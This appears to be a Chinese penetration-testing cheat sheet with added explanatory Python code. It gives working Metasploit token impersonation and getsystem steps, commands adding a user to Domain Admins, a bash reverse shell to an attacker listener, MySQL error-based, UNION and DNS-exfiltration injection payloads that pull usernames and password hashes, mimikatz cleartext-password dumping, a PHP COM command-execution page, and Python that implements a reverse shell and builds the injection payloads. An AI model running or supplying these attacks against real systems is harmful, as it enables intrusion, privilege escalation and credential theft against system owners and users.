msf privilege escalation basics (1)

    A token is, in effect, a temporary credential for the system: holding a user's token is equivalent to holding that account and its password.

    Load the incognito module (newer Metasploit versions use "load incognito"; "use" is the old alias)

    meterpreter > use incognito

    meterpreter > list_tokens -u    // list the available tokens, grouped by user

    meterpreter > impersonate_token WIN-xxxxxxxxx\\Administrator   // impersonate that user's token (the backslash is doubled in the meterpreter shell)

    [+] Successfully impersonated user WIN-xxxxxx\Administrator  // the session now runs as Administrator

    meterpreter > getsystem   // automatically try the built-in escalation techniques

    ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

    meterpreter > getuid   // identity of the current session

    Server username: NT AUTHORITY\SYSTEM


    The two token types incognito lists:

    delegation: delegation tokens, created for interactive logons (console, RDP). They can be used to authenticate to other hosts on the network.

    impersonation: impersonation tokens, created for non-interactive sessions (e.g. a network logon or a mapped drive). They are only valid for actions on the local machine.

    The backslash between the host/domain name and the user name must be doubled:

    meterpreter > impersonate_token win7-pc\\administrator

    Add a domain user

    net user ihoney ihoney1 /add /domain

    Add the user to the Domain Admins group

    net group "domain admins" ihoney /add /domain

    List the members of the Domain Admins group

    net group "domain admins" /domain

    Upload an exe from the attacker machine to the target

    meterpreter > upload /root/ma.exe c:


    Reverse shell. The attacker machine (yyy) must start listening first, otherwise the connect-back is refused:

    [root@yyy ~]# nc -vv -l -p 9999

    Then on the compromised host (xxx), point an interactive bash at the listener over TCP. ">&" sends stdout and stderr to the socket, "0>&1" makes the shell read stdin from the same socket:

    [root@xxx hashcrack]# bash -i >& /dev/tcp/yyy/9999 0>&1
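    The same connect-back mechanism written out in Python, as an added example (not code from the original post): both ends run on 127.0.0.1 so it works offline, the listener lets the OS pick a free port instead of the post's 9999, and /bin/sh is assumed to exist. The victim side shows what the bash redirections do: the connected socket is installed as the shell's fd 0, 1 and 2.

```python
"""Reverse shell on localhost: listener (the 'nc -l' side) plus a connect-back shell."""
import socket
import subprocess
import threading
from typing import Tuple


def start_listener(host: str = "127.0.0.1") -> Tuple[socket.socket, int]:
    """Attacker side, equivalent to 'nc -vv -l -p PORT'. Bind and listen BEFORE the
    victim connects; port 0 lets the OS choose a free port (assumption for the demo)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(1)
    return srv, srv.getsockname()[1]


def connect_back(host: str, port: int) -> int:
    """Victim side. Connecting to /dev/tcp/HOST/PORT is just a TCP connect; '>&' and '0>&1'
    are dup2() of the socket onto stdout/stderr and stdin, which Popen does for us when it is
    handed the socket's file descriptor for all three streams."""
    sock = socket.create_connection((host, port))
    fd = sock.fileno()
    # plain /bin/sh instead of 'bash -i' keeps prompt noise out of the captured output
    proc = subprocess.Popen(["/bin/sh"], stdin=fd, stdout=fd, stderr=fd)
    sock.close()  # the child process owns its own copies of the descriptor now
    return proc.wait()


def run_demo(command: str = "echo pwned") -> str:
    """Drive one round trip: accept the connect-back, send one command line, collect the
    shell's output until it exits, and return that output as text."""
    srv, port = start_listener()
    victim = threading.Thread(target=connect_back, args=("127.0.0.1", port))
    victim.start()
    conn, _ = srv.accept()
    conn.sendall((command + "\n").encode())
    conn.shutdown(socket.SHUT_WR)  # EOF on the shell's stdin, so sh exits after the command
    chunks = []
    while True:
        data = conn.recv(4096)
        if not data:
            break
        chunks.append(data)
    conn.close()
    srv.close()
    victim.join()
    return b"".join(chunks).decode(errors="replace")


if __name__ == "__main__":
    print(run_demo("id"), end="")
```

    Because the listener owns the socket before the shell is spawned, the same pattern explains why "nc -l" has to be running first: a connect to a port nobody listens on fails immediately with connection refused, and bash simply exits.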


    Error-based injection (MySQL updatexml): the second argument is not a valid XPath expression, so the server's error message echoes it, including the result of user(). Note that the error text is truncated to 32 characters, so long values have to be read in pieces (e.g. with substr()).

    and 1=(updatexml(1,concat(0x3a,(user())),1))#


    whois information gathering

    Run "whois <target domain>" (the bare domain, without www)

    or "whois <target IP address>"

    IPID sequence scan. This module does not look for an open port: it finds hosts whose IP ID field increments predictably, which makes them usable as zombies for an nmap idle scan (-sI).

    use auxiliary/scanner/ip/ipidseq

    show options

    set RHOSTS <target range>/24

    set THREADS 50

    run

    Port-scan a single host (SYN scan; the option is RHOSTS even for one IP, and the module needs root because it sends raw packets)

    use auxiliary/scanner/portscan/syn

    show options

    set RHOSTS <target IP>

    set THREADS 50

    run

    Find hosts running SMB (and report their SMB/OS version)

    use auxiliary/scanner/smb/smb_version

    show options

    set RHOSTS <target range>/24

    set THREADS 50

    run

    Find MSSQL hosts (queries the SQL Server Browser service, UDP 1434)

    use auxiliary/scanner/mssql/mssql_ping

    show options

    set RHOSTS <target range>/24

    set THREADS 50

    run

    SSH server scan (banner/version)

    use auxiliary/scanner/ssh/ssh_version

    show options

    set RHOSTS <target range>/24

    set THREADS 50

    run

    Telnet server scan

    use auxiliary/scanner/telnet/telnet_version

    show options

    set RHOSTS <target range>/24

    set THREADS 50

    run

    FTP server scan (banner/version)

    use auxiliary/scanner/ftp/ftp_version

    show options

    set RHOSTS <target range>/24

    set THREADS 50

    run

    Check for anonymous FTP login

    use auxiliary/scanner/ftp/ftp_anonymous

    show options

    set RHOSTS <target range>/24

    set THREADS 50

    run

    Find live hosts on the local network (ARP, so only the attacker's own broadcast domain)

    use auxiliary/scanner/discovery/arp_sweep

    set RHOSTS <target range>/24

    set THREADS 50

    run

    Brute-force web directories on a site (the option is RHOSTS)

    use auxiliary/scanner/http/dir_scanner

    set RHOSTS <target IP>

    set THREADS 50

    run

    Find SNMP hosts by trying community strings:

    use auxiliary/scanner/snmp/snmp_login

    set RHOSTS <target range>/24

    set THREADS 50

    run

    Collect e-mail addresses for a target domain from search engines

    use auxiliary/gather/search_email_collector

    set DOMAIN <target domain> (without www)

    run

    Sniff credentials from cleartext protocols (FTP, POP3, IMAP, etc.) on the local interface; needs root

    use auxiliary/sniffer/psnuffle

    run


    HTTP/DNS log platform (catches out-of-band callbacks from the target)

    https://exeye.io/register


    Blind SQL injection with DNS exfiltration (the MySQL server must run on Windows, where load_file() on a UNC path triggers a name lookup, and secure_file_priv must not disable load_file):

    union select 1,load_file(concat(0x5c5c5c5c,version(),0x78782E74657374312E69686F6E65797365632E746F702F696969));

    0x5c5c5c5c is four backslashes (the UNC prefix) and the second hex literal decodes to the dnslog name below; hex literals avoid quotes in the payload. When the database executes the query it resolves the dnslog domain, with the output of version() prepended as part of the host name:

    xx.test1.ihoneysec.top/iii


    [Update] MySQL authentication bypass vulnerability and exploitation (CVE-2012-2122): www.freebuf.com/vuls/3815.html


    Commonly used commands after getting a shell (situational awareness before escalating):

    whoami                       current user

    net user                     local accounts

    net view                     hosts visible on the network

    net start                    services that are running

    systeminfo                   OS version, architecture, installed hotfixes

    hostname

    ipconfig /all

    tasklist /svc                find the PID of the process hosting TermService (the RDP service)

    netstat -ano                 find the port that PID is listening on (RDP is not always on 3389)

    arp -a

    route print

    netsh firewall show state    firewall status (legacy syntax; on Vista and later prefer netsh advfirewall)

    netsh firewall show config

    dir

    type

    copy
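    The TermService-to-port step above is a join on the PID between two command outputs. As an added example (not from the original post), the parser below does that join over constructed sample output of tasklist /svc and netstat -ano; the process names, PIDs and ports in the samples are made up for the demo.

```python
"""Find the TCP port(s) a Windows service listens on from 'tasklist /svc' + 'netstat -ano'."""
from typing import Dict, List, Set

# Constructed sample of `tasklist /svc` output (not captured from a real host).
TASKLIST_SVC = """\
Image Name                     PID Services
========================= ======== ============================================
svchost.exe                    884 TermService
svchost.exe                    912 Dnscache, NlaSvc
sqlservr.exe                  1620 MSSQLSERVER
"""

# Constructed sample of `netstat -ano` output; RDP appears on both the IPv4 and IPv6 socket.
NETSTAT_ANO = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       700
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       884
  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING       1620
  TCP    192.168.1.20:3389      192.168.1.9:51022      ESTABLISHED     884
  TCP    [::]:3389              [::]:0                 LISTENING       884
"""


def service_pids(tasklist_out: str) -> Dict[str, int]:
    """Map service name -> hosting PID. One svchost.exe can host several services,
    listed comma-separated in the third column; header/separator lines have no numeric PID."""
    pids: Dict[str, int] = {}
    for line in tasklist_out.splitlines():
        parts = line.split(None, 2)
        if len(parts) < 3 or not parts[1].isdigit():
            continue
        for svc in parts[2].split(","):
            pids[svc.strip()] = int(parts[1])
    return pids


def listening_ports(netstat_out: str) -> Dict[int, Set[int]]:
    """Map PID -> set of TCP ports in LISTENING state. rsplit on ':' handles '[::]:3389'."""
    ports: Dict[int, Set[int]] = {}
    for line in netstat_out.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "TCP" and parts[3] == "LISTENING":
            port = int(parts[1].rsplit(":", 1)[1])
            ports.setdefault(int(parts[4]), set()).add(port)
    return ports


def service_listen_ports(tasklist_out: str, netstat_out: str, service: str) -> List[int]:
    """The manual step from the notes: service -> PID (tasklist) -> port (netstat)."""
    pid = service_pids(tasklist_out).get(service)
    if pid is None:
        return []
    return sorted(listening_ports(netstat_out).get(pid, set()))


if __name__ == "__main__":
    print("TermService listens on", service_listen_ports(TASKLIST_SVC, NETSTAT_ANO, "TermService"))
```

    The join matters because the RDP listener port is configurable (PortNumber under the RDP-Tcp registry key), so assuming 3389 is the one thing this step is meant to avoid.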


    Related articles:

    http://www.5kik.com/phpnews/3.html (executing commands from PHP through WSH and Shell.Application)

    https://blog.csdn.net/jaray/article/details/49093317 (PHP reports that the COM class cannot be found)

    https://www.cnblogs.com/phpk/p/6097353.html (ini_set("display_errors","On"); and error_reporting(E_ALL);)


    Prerequisites:

    You need to know the web root path, and upload wucanshu.exe (F4ck's add-user tool, which creates the account through the Windows API)


    Visit http://ip/wsh.php (the original had two typos: the ini option is display_errors, and the fallback is die(), not dir())

    <?php

    ini_set("display_errors", "On");   // show PHP errors in the response, useful when COM is not available

    error_reporting(E_ALL);

    echo 1;

    // Shell.Application COM object (needs the php_com_dotnet extension on Windows)
    $wsh = new COM("Shell.Application") or die("Failed!");

    // open() launches the file as ShellExecute would; single quotes keep the backslashes literal
    $exec = $wsh->open('C:\www\wucantishi.exe');

    echo $exec;

    echo 21;

    ?>


    Running it adds a user through the API:

    UserName: F4ck

    PassWord: F4ckTeam!@#


    Downloading large files through China Chopper (菜刀) may fail; rename the file's extension to .rar and download it with a browser instead.

    IIS 8.0 returns 404 for files with the .mdb extension by default (request filtering blocks the extension), so they cannot be downloaded directly.


    Two mimikatz commands to read cleartext passwords from memory:

    privilege::debug

    sekurlsa::logonpasswords

    Load mimikatz in msf and read cleartext:

    meterpreter > use mimikatz

    meterpreter > wdigest

    Current Metasploit ships this as the kiwi extension instead: "load kiwi", then creds_wdigest or creds_all. On Windows 8.1 / Server 2012 R2 and later (or older systems with KB2871997 installed) WDigest no longer caches cleartext passwords unless the UseLogonCredential registry value is set to 1, so the output may be empty.


    F4ck tool, adding a user with parameters:

    7.exe ceshi 12345678 administrator /add

    This creates the user ceshi (password 12345678) as a clone of the administrator account.


    Captured sqlmap request that dumps all database names:

    http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT NULL,NULL,CONCAT(0x716a626a71,IFNULL(CAST(schema_name AS CHAR),0x20),0x7171786b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA%23

    (0x716a626a71 and 0x7171786b71 are sqlmap's marker strings "qjbjq" and "qqxkq"; they bracket the extracted value so sqlmap can locate it in the response. %23 is the URL-encoded "#" that comments out the rest of the query.)

    Manual test, read the database names (the third column is the one echoed on the page, the other eleven are padding):

    http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT 1,2,GROUP_CONCAT(schema_name),4,5,6,7,8,9,10,11,12 FROM INFORMATION_SCHEMA.SCHEMATA%23

    Table names (0x736561 is the hex form of the database name "sea", so no quotes are needed):

    http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT 1,2,GROUP_CONCAT(table_name),4,5,6,7,8,9,10,11,12 FROM INFORMATION_SCHEMA.tables where table_schema=0x736561%23

    Column names:

    http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT 1,2,GROUP_CONCAT(column_name),4,5,6,7,8,9,10,11,12 FROM INFORMATION_SCHEMA.columns where table_schema=0x736561 and table_name='nh_user'%23

    Read accounts and passwords:

    http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT 1,2,GROUP_CONCAT(id,'%2c',username,'%2c',password),4,5,6,7,8,9,10,11,12 FROM sea.nh_user%23

    Result: 1,xiaodi,c44af6fc4c97a6b1e93885cc4ae399f2 (a 32-hex-character hash, MD5 length)
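    The hex literals and UNION padding in these payloads, in the error-based updatexml payload and in the load_file DNS-exfiltration payload earlier on the page are all the same small set of transformations. The helpers below are an added example (not code from the original post): they encode/decode MySQL 0x literals, rebuild the page's own payloads from their parts, and decode the literals found in a captured request, which is what you need when reading sqlmap traffic in web logs. The injection prefix "28)", the twelve-column layout, the sample URL and the dnslog name are taken from the notes; the function names are my own.

```python
"""Build and read the MySQL injection payloads used in the notes."""
import re
from typing import List, Tuple
from urllib.parse import quote

HEX_LITERAL = re.compile(r"0x(?:[0-9A-Fa-f]{2})+")

# The captured sqlmap request from the notes, used below to show log decoding.
SQLMAP_SAMPLE = ("28) UNION ALL SELECT NULL,NULL,CONCAT(0x716a626a71,IFNULL(CAST(schema_name AS CHAR),0x20),"
                 "0x7171786b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA%23")


def mysql_hex(text: str) -> str:
    """Encode text as a MySQL 0x.. literal: it compares equal to the string but needs no quotes,
    which is why payloads use 0x736561 instead of 'sea' when quotes are escaped or filtered."""
    return "0x" + text.encode("utf-8").hex()


def mysql_unhex(literal: str) -> str:
    """Decode a 0x.. literal back to text."""
    return bytes.fromhex(literal[2:]).decode("utf-8", errors="replace")


def decode_hex_literals(payload: str) -> List[Tuple[str, str]]:
    """Every 0x.. literal in a request with its decoded text (sqlmap markers, table names, ...)."""
    return [(m.group(0), mysql_unhex(m.group(0))) for m in HEX_LITERAL.finditer(payload)]


def updatexml_payload(expr: str = "user()") -> str:
    """Error-based: concat(':', expr) is not valid XPath, so MySQL quotes it in the error text.
    Only the first 32 characters of the error are shown, so long values need substr()."""
    return f"and 1=(updatexml(1,concat({mysql_hex(':')},({expr})),1))#"


def dns_exfil_payload(expr: str, dnslog_host: str) -> str:
    """Out-of-band: load_file() on a UNC path makes a Windows MySQL host resolve the name, so the
    value of expr becomes part of a host name in the attacker's DNS log. Four backslashes as in
    the notes; requires secure_file_priv not to disable load_file()."""
    return (f"union select 1,load_file(concat({mysql_hex(chr(92) * 4)},{expr},"
            f"{mysql_hex(dnslog_host)}));")


def union_payload(expr: str, position: int, ncols: int, from_clause: str,
                  prefix: str = "28)") -> str:
    """UNION-based: expr goes in the column the page echoes, the rest are numeric padding."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[position - 1] = expr
    return f"{prefix} UNION ALL SELECT {','.join(cols)} FROM {from_clause}#"


def enumeration_steps(schema: str, table: str) -> List[str]:
    """The manual sequence from the notes: databases -> tables -> columns -> rows."""
    return [
        union_payload("GROUP_CONCAT(schema_name)", 3, 12, "INFORMATION_SCHEMA.SCHEMATA"),
        union_payload("GROUP_CONCAT(table_name)", 3, 12,
                      f"INFORMATION_SCHEMA.tables where table_schema={mysql_hex(schema)}"),
        union_payload("GROUP_CONCAT(column_name)", 3, 12,
                      f"INFORMATION_SCHEMA.columns where table_schema={mysql_hex(schema)} "
                      f"and table_name={mysql_hex(table)}"),
        union_payload("GROUP_CONCAT(id,0x2c,username,0x2c,password)", 3, 12, f"{schema}.{table}"),
    ]


def to_url(base: str, param: str, payload: str) -> str:
    """URL-encode the payload; '#' in particular must become %23 or the browser drops it as a fragment."""
    return f"{base}?{param}={quote(payload, safe='(),=*')}"


if __name__ == "__main__":
    for lit, text in decode_hex_literals(SQLMAP_SAMPLE):
        print(f"{lit} -> {text!r}")
    for step in enumeration_steps("sea", "nh_user"):
        print(to_url("http://127.0.0.1/sea/sea/Home/Index/data.html", "data", step))
```

    Decoding the literals is the defender's half of this: a request line containing 0x716a626a71 and 0x7171786b71 is sqlmap's signature in a web log, even when the rest of the query is obfuscated.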


Original URL: https://www.cnblogs.com/i-honey/p/8825034.html